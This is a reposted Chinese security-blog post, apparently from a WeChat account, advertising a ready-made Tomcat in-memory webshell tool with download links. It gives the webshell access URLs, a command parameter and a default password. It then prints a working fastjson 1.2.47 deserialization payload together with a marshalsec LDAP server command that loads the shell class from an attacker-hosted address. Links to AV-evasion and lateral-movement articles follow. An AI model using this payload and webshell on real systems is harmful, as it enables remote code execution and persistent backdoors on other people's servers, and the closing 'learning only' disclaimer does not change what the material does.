【神兵利器 | 附下载】开箱即用的内存马

admin 2022年5月9日19:29:04评论24 views字数 1107阅读3分41秒阅读模式

项目作者:ce-automne

项目地址:https://github.com/ce-automne/TomcatMemShell


一、工具简介

拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马。


二、使用方法

1、Listener型/Filter型:

CMD内存马URL:xx.xx.xx.xx/?chan=whoami冰蝎内存马URL:xx.xx.xx.xx/     默认连接密码:goautomne

2、Servlet型:

CMD内存马URL: xx.xx.xx.xx/p?chan=whoami冰蝎内存马URL: xx.xx.xx.xx/p     默认连接密码:goautomne

三、利用举例

以fastjson1.2.47版本的反序列化漏洞为例,将对应Tomcat版本的class文件,这里以ILRain.class为例,上传到web服务器,并开启LDAP服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://xx.xx.xx.xx/#ILRain 9102

然后再打入fastjson漏洞的poc,就可以使用冰蝎客户端去连接了

{    "a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"ldap://xx.xx.xx.xx:9102/123",        "autoCommit":true    }}


四、下载地址

1、通过项目地址下载

后台回复“20220509”也可获取

【神兵利器 | 附下载】开箱即用的内存马

>精彩回顾<

干货 | 红队快速批量打点的利器

【干货】最全的Tomcat漏洞复现

{Vulhub漏洞复现(一)ActiveMQ}

{Vulhub漏洞复现(二) Apereo CAS}

Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法

【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现

干货 | 横向移动与域控权限维持方法总汇

干货 | 免杀ShellCode加载框架

【干货】phpMyAdmin漏洞利用汇总


【神兵利器 | 附下载】开箱即用的内存马

关注我

获得更多精彩

【神兵利器 | 附下载】开箱即用的内存马


坚持学习与分享!走过路过点个"在看",不会错过【神兵利器 | 附下载】开箱即用的内存马

仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文

觉得文章不错给点个‘再看’吧

原文始发于微信公众号(EchoSec):【神兵利器 | 附下载】开箱即用的内存马

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月9日19:29:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【神兵利器 | 附下载】开箱即用的内存马http://cn-sec.com/archives/992333.html

发表评论

匿名网友 填写信息